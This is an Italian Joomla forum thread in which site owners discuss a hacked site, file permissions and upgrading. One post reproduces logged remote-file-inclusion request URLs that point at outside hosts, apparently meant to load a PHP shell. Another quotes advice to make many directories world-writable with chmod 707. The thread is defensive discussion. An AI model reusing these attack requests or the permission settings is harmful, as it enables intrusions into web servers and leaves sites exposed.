Back to top

Autore Topic: colpito e affondato: in meno di 12 ore due attacchi al sito  (Letto 9232 volte)

Offline tasto

  • Abituale
  • ****
  • Post: 1300
  • Sesso: Maschio
    • Mostra profilo
Adesso mi tocca cancellare tutto. Mi hanno canbiato la pass per accedere all'administrator
avevo installato anche dei mambot, ma niente
Bisogna fare un post con tutti i consigli da dare agli utenti per creare una minima barriera contro questi "stupidini"

Offline cos

  • Abituale
  • ****
  • Post: 1873
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #1 il: 07 Ago 2007, 08:43:41 »
"stupidini"


Spupidini   .......... ???

Sono dei veri delinquenti io li equiparo a degli scassinatori

e come se qualcuno mi entrasse in casa

cribbio !!

che versione hai ???

Offline tasto

  • Abituale
  • ****
  • Post: 1300
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #2 il: 07 Ago 2007, 09:05:30 »
Stupidini... per non scrivere un'altra parola  ;D
1.0.12

Offline Maorinz

  • Instancabile
  • ******
  • Post: 2641
  • Sesso: Maschio
  • ©il brillar per se stessi non porta emozioni
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #3 il: 07 Ago 2007, 09:11:05 »
La discussione mi interessa.

Molte volte leggo di tentativi più o meno riusciti di hackeraggio.....
A mio parere manca una guida che serva a mettersi al riparo almeno dai tentativi più comuni, partendo proprio dai punti base tipo: come formulare le pwd, o altro.
Penso chea sarebbe utile a molti come me...
Chiaro che se l'intento è di entrarci lo fanno comunque, ma se invece di usare una comune chiave devono invece preoccuparsi dell'allarme, dei cani, e la porta invece che di compensato la trovano blindata.....
Ciao!

Offline Luca Curatola

  • Team Joomla.it
  • Abituale
  • *******
  • Post: 1086
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #4 il: 07 Ago 2007, 09:41:10 »
Da quando mi amministro il server non ho piu' avuto problemi ;)
Sgaragnao il provider più ricercato su google! :)

carlo_gra

  • Visitatore
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #5 il: 07 Ago 2007, 09:49:16 »
Stupidini... per non scrivere un'altra parola  ;D
1.0.12

COnviene che una volta ripristinato il ripristinabile fai un aggiornamento alla 1.0.13...

Offline .Andrea S.

  • Instancabile
  • ******
  • Post: 4404
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #6 il: 07 Ago 2007, 09:52:00 »
..........
Bisogna fare un post con tutti i consigli da dare agli utenti
..........

come avevi impostato i permessi di cartelle e file?
Andrea | www.joomlovers.net | Il sito per gli amanti di Joomla!

Offline surfbit

  • Instancabile
  • ******
  • Post: 7316
  • Sesso: Maschio
  • Verranno ignorati mp tecnici
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #7 il: 07 Ago 2007, 12:01:26 »
Sottolineo l'intervento di Maori_nz non sarebbe male una guida proprio partendo dalle non belle esperienze di tutti.
Una sezione che rigurda la sicurezza c'è ma in inglese:

http://forum.joomla.org/index.php?board=267.0
A volte basta un sorriso per far felice una persona.

La guida alla scelta dell'hosting per Joomla!  Joomlaspace.it: l'hosting per Joomla

Offline tasto

  • Abituale
  • ****
  • Post: 1300
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #8 il: 07 Ago 2007, 12:22:40 »
nel sito ho facileform, docman, newsflash ajax ci sono problemi se installo la .13?

Offline .Andrea S.

  • Instancabile
  • ******
  • Post: 4404
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #9 il: 07 Ago 2007, 12:29:31 »
..........
Bisogna fare un post con tutti i consigli da dare agli utenti
..........

come avevi impostato i permessi di cartelle e file?
Andrea | www.joomlovers.net | Il sito per gli amanti di Joomla!

Offline tasto

  • Abituale
  • ****
  • Post: 1300
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #10 il: 07 Ago 2007, 12:31:44 »
755

Tramite google analytics ho trovato la fonte di origine delle visite al mio sito... sono turchi e nel loro sito ho trovato questo
Citazione
Standart Joomla Güvenlik - İdeal Chmod Ayarları! - 05-08-2007, 01:10 AM

JOOMLA KURULDUKTAN SONRA YAPMANIZ GEREKEN
dogru chmod ayarlarini gosterir
klasor ve klasor icindeki dosyalalarin tamaminin chmod ayarini yapan
FTP PROGRAMI KULLANMALISINIZ
belli ftp programlari sadece klasoru 755 yaparsa icindeki dosyalarin chmod u degismez
genelde flashxfp de bu ozellik var
ftp programiniz bunu yapamiyorsa
klasoru acip icindeki tum dosyalari secip
chmod larini ornegin 755 yapmaniz gerekli
alttaki verilen degerleri klasor ve dosyalariniza MUHAKKAK UGULARSANIZ
gece mi$il Mi$il uyuyabilirsiniz !! yoksa siteniz yol gecen hanina doner !
change the permissions of the
images/,
media/,
uploadfiles/
administrator/backups .... directories to 707, this should be done recursively:
chmod -R 707 images
chmod -R 707 media
chmod -R 707 uploadfiles
chmod -R 707 components
chmod -R 707 languages
chmod -R 707 modules
chmod -R 707 templates
chmod -R 707 administrator/backups
chmod -R 707 administrator/components
chmod 744 configuration.php

Offline .Andrea S.

  • Instancabile
  • ******
  • Post: 4404
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #11 il: 07 Ago 2007, 14:02:11 »
Se avevi il 755 anche per i file (sopratutto configuration) il problema è quello.
Andrea | www.joomlovers.net | Il sito per gli amanti di Joomla!

Offline flavio b.

  • Nuovo arrivato
  • *
  • Post: 32
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #12 il: 07 Ago 2007, 16:03:56 »
per condividere la mia esperienza,
in data odierna mi è capitato di registrare le seguenti "intrusioni"(ne avevo già parlato in altro post: gli IP utilizzano il noto Browser Lynx e quei percorsi che vedete forse  sono un percorso per includere una shell in php e prendere possesso della macchina...
 
questi tentativi sono stati effettuati stamani:

Codice: [Seleziona]
http://www.miosito.com/index.php?site=http://abc.someshit.ru/c.ar??
http://www.miosito.com/index.php?loca=http://usuarios.arnet.com.ar/larry123/safe.txt?
http://www.miosito.com/index.php?loca=http://usuarios.arnet.com.ar/larry123/safe.txt?

tutto questo fatto da ragazzini che sanno lanciare un eseguibile e scrivere un url, spacciandosi per hacker e fare i bulletti con gli amici senza pensare che ci sono persone che a causa loro perdono tempo e denaro.

Offline tasto

  • Abituale
  • ****
  • Post: 1300
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #13 il: 07 Ago 2007, 16:45:28 »
cme devono essere settati i permessi?

Offline .Andrea S.

  • Instancabile
  • ******
  • Post: 4404
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #14 il: 07 Ago 2007, 16:47:12 »
755 dir e 644 file
Andrea | www.joomlovers.net | Il sito per gli amanti di Joomla!

Offline .Andrea S.

  • Instancabile
  • ******
  • Post: 4404
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #15 il: 07 Ago 2007, 16:49:58 »
per condividere la mia esperienza,
........

Ma questi sono tentativi che abbiamo tutti, spider che vanno alla ricerca di gente che lascia la "porta aperta".
Certo che se lasci la porta aperta e poi ti lamenti che sono venuti i ladri...  :(
Andrea | www.joomlovers.net | Il sito per gli amanti di Joomla!

Offline tasto

  • Abituale
  • ****
  • Post: 1300
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #16 il: 07 Ago 2007, 21:01:29 »
domanda forse stupida... se nella configurazione del sito spunto la casella per rendere "non scrivibile il file"? risolvo qualcosa?

Offline zizou2

  • Appassionato
  • ***
  • Post: 369
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #17 il: 07 Ago 2007, 22:17:54 »
755 dir e 644 file

cioè tutte le cartelle a 755?

e i file nella root a 644?

ho capito bene?

scusa ma sono ancora molto inesperto

ciao

Offline zizou2

  • Appassionato
  • ***
  • Post: 369
  • Sesso: Maschio
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #18 il: 07 Ago 2007, 22:35:35 »
è possibile che il mio sito sia settato tutto su 644 e funzioni perfettamente almeno fino ad ora?


Offline flavio b.

  • Nuovo arrivato
  • *
  • Post: 32
    • Mostra profilo
Re: colpito e affondato: in meno di 12 ore due attacchi al sito
« Risposta #19 il: 08 Ago 2007, 00:03:16 »
per condividere la mia esperienza,
........

Ma questi sono tentativi che abbiamo tutti, spider che vanno alla ricerca di gente che lascia la "porta aperta".
Certo che se lasci la porta aperta e poi ti lamenti che sono venuti i ladri...  :(

Quindi non mi devo preoccupare di questi spider?
significa che non sono entrati?

 



Web Design Bolzano Kreatif